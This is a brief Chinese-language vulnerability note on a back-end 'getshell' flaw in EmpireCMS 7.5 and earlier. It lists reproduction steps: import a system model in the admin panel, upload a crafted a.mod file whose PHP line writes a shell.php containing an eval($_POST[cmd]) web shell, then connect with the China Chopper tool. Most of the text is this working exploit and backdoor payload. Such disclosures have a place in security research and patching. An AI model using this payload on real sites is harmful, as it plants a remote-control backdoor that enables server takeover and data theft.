跳转至

EmpireCMS V7.5后台getshell漏洞

漏洞范围

EmpireCMS <= 7.5

漏洞验证

1.进入后台如下界面,点击导入系统模型 2.构造文件a.mod,内容如下

<?php file_put_contents("shell.php","<?php @eval(\$_POST[cmd]);?>");?>

3.上传文件a.mod 4.查看文件已经有shell.php了,菜刀连接即可